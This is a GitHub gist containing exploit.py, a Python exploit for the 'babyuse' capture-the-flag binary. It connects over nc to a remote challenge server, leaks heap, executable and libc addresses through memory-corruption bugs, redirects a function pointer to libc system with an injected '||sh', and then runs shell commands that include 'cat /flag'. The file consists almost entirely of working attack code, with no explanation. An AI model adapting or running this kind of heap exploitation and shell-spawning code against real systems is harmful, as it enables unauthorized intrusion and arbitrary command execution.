Skip to content

Instantly share code, notes, and snippets.

@autotaker

autotaker/exploit.py

Created April 17, 2017 09:07
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save autotaker/bbc00350a0919027da07c8846de3515c to your computer and use it in GitHub Desktop.
Save autotaker/bbc00350a0919027da07c8846de3515c to your computer and use it in GitHub Desktop.
Download ZIP
Raw
exploit.py
import subprocess
import struct
import time
from secret import TOKEN
remote = True
if remote:
cmd = 'nc 202.112.51.247 3456'
else:
cmd = './babyuse'
p = subprocess.Popen(cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
shell=True)
def send(s):
print("SEND: %s" % repr(s))
p.stdin.write(s)
p.stdin.flush()
def recv():
s = p.stdout.readline()
print("RECV: %s" % repr(s))
return s
def unpack(s):
return struct.unpack('<I', s)[0]
def pack(x):
return struct.pack('<I', x)
def echo(s):
send(s + b'\n')
def leak_heap():
echo(b"1")
echo(b"1")
echo(b"30")
echo(b"hog")
echo(b"1")
echo(b"1")
echo(b"15")
echo(b"01234")
echo(b"2")
echo(b"1")
echo(b"6")
echo(b"0")
echo(b"6")
echo(b"1")
echo(b"5")
echo(b"4")
while True:
s = recv()
if b'Select gun' in s:
addr = s.split(b' ')[2][:4]
assert(len(addr) >= 4)
addr = unpack(addr)
print("%x" % addr)
break
while b'7. Exit' in recv():
pass
return addr
def leak_exe(heap_offset):
echo(b"1")
echo(b"1")
echo(b"15")
echo(b"01234")
echo(b"1")
echo(b"1")
echo(b"15")
echo(b"01234")
echo(b"6")
echo(b"1")
echo(b"4")
echo(b"0")
echo(b"15")
addr = 0x5655ea50 + heap_offset
echo(b'AAAA' + pack(addr) )
echo(b'5') # this leaks binary_base + 0x1d30
echo(b'4')
while True:
s = recv()
if b'Select gun' in s:
addr = s.split(b' ')[2][:4]
assert(len(addr) >= 4)
addr = unpack(addr)
print("%x" % addr)
break
while b'7. Exit' in recv():
pass
return addr
def leak_libc(exe_base):
echo(b"1")
echo(b"1")
echo(b"15")
echo(b"01234")
echo(b"6")
echo(b"1")
echo(b"4")
echo(b"0")
echo(b"15")
echo(b"AAAA" + pack(0x3fd0 + exe_base))
echo(b'5') # this leaks free@libc
echo(b'4')
while True:
s = recv()
if b'Select gun' in s:
addr = s.split(b' ')[2][:4]
assert(len(addr) >= 4)
addr = unpack(addr)
print("%x" % addr)
break
while b'7. Exit' in recv():
pass
return addr
def shell(heap_offset, system_libc):
echo(b"1")
echo(b"1")
echo(b"15")
echo(b"01234")
echo(b"1")
echo(b"1")
echo(b"15")
echo(pack(system_libc))
echo(b"6")
echo(b"1")
echo(b"4")
echo(b"0")
echo(b"15")
addr = heap_offset + 0x5655eab0
print("addr = %x"% addr)
echo(pack(addr)*2 + b'||sh')
echo(b'5')
echo(b'1')
for _ in range(80):
s = recv()
if b'Select gun' in s:
break
time.sleep(1)
echo(b'pwd')
echo(b'ls /')
echo(b'cat /flag')
echo(b'exit')
echo(b'4')
echo(b'7')
while len(recv()) >0:
pass
if remote:
echo(TOKEN)
heap_gdb = 0x5655ea08
if remote:
free_relative = 0x000712f0
system_relative = 0x0003ada0
else:
free_relative = 0x705b0
system_relative = 0x3a940
heap_current = leak_heap()
heap_offset = heap_current - heap_gdb
print("offset = %x" % heap_offset)
exe_current = leak_exe(heap_offset)
exe_base = exe_current - 0x1d30
print("exe_base = %s", exe_base)
free_libc = leak_libc(exe_base)
system_libc = free_libc + system_relative - free_relative
print("system_libc = %x"% system_libc)
shell(heap_offset, system_libc)
p.kill()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment